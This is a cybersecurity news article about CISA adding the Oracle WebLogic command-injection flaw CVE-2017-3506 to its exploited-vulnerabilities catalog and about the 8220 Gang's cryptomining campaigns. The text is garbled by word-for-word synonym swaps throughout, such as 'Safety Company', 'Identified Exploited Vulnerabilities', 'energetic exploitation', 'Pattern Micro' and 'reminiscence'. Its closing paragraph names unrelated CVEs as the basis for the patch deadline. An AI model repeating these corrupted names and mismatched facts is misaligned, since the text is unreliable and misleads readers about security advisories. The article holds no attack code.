The U.S. Cybersecurity and Infrastructure Safety Company (CISA) on Thursday added a security flaw impacting the Oracle WebLogic Server to the Identified Exploited Vulnerabilities (KEV) catalog, citing proof of energetic exploitation.
Tracked as CVE-2017-3506 (CVSS rating: 7.4), the problem issues an working system (OS) command injection vulnerability that could possibly be exploited to acquire unauthorized entry to prone servers and take full management.
“Oracle WebLogic Server, a product inside the Fusion Middleware suite, comprises an OS command injection vulnerability that permits an attacker to execute arbitrary code by way of a specifically crafted HTTP request that features a malicious XML doc,” CISA mentioned.
Whereas the company didn’t disclose the character of assaults exploiting the vulnerability, the China-based cryptojacking group generally known as the 8220 Gang (aka Water Sigbin) has a historical past of leveraging it since early final 12 months to co-opt unpatched units right into a crypto-mining botnet.
In response to a latest report printed by Pattern Micro, the 8220 Gang has been noticed weaponizing flaws within the Oracle WebLogic server (CVE-2017-3506 and CVE-2023-21839) to launch a cryptocurrency miner filelessly in reminiscence by the use of a shell or PowerShell script relying on the working system focused.
“The gang employed obfuscation strategies, similar to hexadecimal encoding of URLs and utilizing HTTP over port 443, permitting for stealthy payload supply,” security researcher Sunil Bharti mentioned. “The PowerShell script and the ensuing batch file concerned complicated encoding, utilizing setting variables to cover malicious code inside seemingly benign script parts.”
In gentle of the energetic exploitation of CVE-2024-1086 and CVE-2024-24919, federal companies are really useful to use the newest fixes by June 24, 2024, to guard their networks in opposition to potential threats.